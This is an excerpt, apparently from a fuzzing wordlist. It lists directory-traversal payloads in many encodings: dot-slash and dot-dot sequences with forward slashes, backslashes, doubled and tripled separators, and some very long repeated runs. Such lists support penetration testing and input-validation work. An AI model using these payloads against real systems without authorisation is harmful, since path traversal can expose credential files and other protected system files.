594 | .\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\
595 | .\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\
596 | .\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\
597 | .\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\
598 | .\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\..\
599 | ./../
600 | ./.././../
601 | ./.././.././../
602 | ./.././.././.././../
603 | ./.././.././.././.././../
604 | ./.././.././.././.././.././../
605 | ./.././.././.././.././.././.././../
606 | ./.././.././.././.././.././.././.././../
607 | .\..\
608 | .\..\.\..\
609 | .\..\.\..\.\..\
610 | .\..\.\..\.\..\.\..\
611 | .\..\.\..\.\..\.\..\.\..\
612 | .\..\.\..\.\..\.\..\.\..\.\..\
613 | .\..\.\..\.\..\.\..\.\..\.\..\.\..\
614 | .\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\
615 | .//..//
616 | .//..//.//..//
617 | .//..//.//..//.//..//
618 | .//..//.//..//.//..//.//..//
619 | .//..//.//..//.//..//.//..//.//..//
620 | .//..//.//..//.//..//.//..//.//..//.//..//
621 | .//..//.//..//.//..//.//..//.//..//.//..//.//..//
622 | .//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//
623 | .\\..\\
624 | .\\..\\.\\..\\
625 | .\\..\\.\\..\\.\\..\\
626 | .\\..\\.\\..\\.\\..\\.\\..\\
627 | .\\..\\.\\..\\.\\..\\.\\..\\.\\..\\
628 | .\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\
629 | .\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\
630 | .\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\
631 | ../
632 | ../..//
633 | ../..//../
634 | ../..//../..//
635 | ../..//../..//../
636 | ../..//../..//../..//
637 | ../..//../..//../..//../
638 | ../..//../..//../..//../..//
639 | ..\
640 | ..\..\\
641 | ..\..\\..\
642 | ..\..\\..\..\\
643 | ..\..\\..\..\\..\
644 | ..\..\\..\..\\..\..\\
645 | ..\..\\..\..\\..\..\\..\
646 | ..\..\\..\..\\..\..\\..\..\\
647 | ..///
648 | ../..///
649 | ../..//..///
650 | ../..//../..///
651 | ../..//../..//..///
652 | ../..//../..//../..///
653 | ../..//../..//../..//..///
654 | ../..//../..//../..//../..///
655 | ..\\\
656 | ..\..\\\
657 | ..\..\\..\\\
658 | ..\..\\..\..\\\
659 | ..\..\\..\..\\..\\\
660 | ..\..\\..\..\\..\..\\\
661 | ..\..\\..\..\\..\..\\..\\\
662 | ..\..\\..\..\\..\..\\..\..\\\
663 | 


--------------------------------------------------------------------------------